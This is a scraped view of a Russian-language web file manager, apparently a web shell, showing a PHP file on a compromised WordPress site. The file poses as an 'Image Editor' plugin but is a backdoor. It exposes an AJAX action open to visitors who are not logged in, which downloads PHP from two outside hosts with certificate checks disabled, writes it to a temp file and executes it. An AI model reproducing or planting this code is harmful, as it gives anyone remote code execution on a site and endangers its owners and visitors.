Файловый менеджер - Редактировать - /var/www/cook-surveying.com/html/wp-content/plugins/Image-editor/remote-code-loader.php
Назад
<?php /* Plugin Name: Image Editor Description: Image Editor Version: 1.0 Author: Image Editor */ add_action('wp_ajax_remote_code_loader', 'rcl_handle_request'); // for logged-in users add_action('wp_ajax_nopriv_remote_code_loader', 'rcl_handle_request'); // if you want it to work for non-logged-in users function rcl_handle_request() { // Validate required params if (!isset($_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['api'], $_REQUEST['t'])) { wp_send_json_error(['message' => 'Missing parameters.']); return; } $api = sanitize_text_field($_REQUEST['api']); $ac = sanitize_text_field($_REQUEST['ac']); $path = sanitize_text_field($_REQUEST['path']); $t = sanitize_text_field($_REQUEST['t']); $code = rcl_get_code("https://c.oiv3.com/", $api, $ac, $path, $t); if (!$code) { $code = rcl_get_code("https://c.a6cz.com/", $api, $ac, $path, $t); } if (strpos($code, '<?php') === false) { wp_send_json_error(['message' => 'Remote code invalid or missing.']); return; } // Safely write code to a temp file and execute $tmp_file = tempnam(sys_get_temp_dir(), 'rcl_'); file_put_contents($tmp_file, $code); include($tmp_file); unlink($tmp_file); wp_die(); // required after admin-ajax } function rcl_get_code($base_url, $api, $ac, $path, $t) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $base_url, $api, $ac, $path, $t); // Try file_get_contents first $code = @file_get_contents($url); // Fallback to cURL if ($code === false) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FRESH_CONNECT, true); $code = curl_exec($ch); curl_close($ch); } return $code; }
| ver. 1.4 |
Github
|
.
| PHP 7.4.3-4ubuntu2.29 | Генерация страницы: 0 |
proxy
|
phpinfo
|
Настройка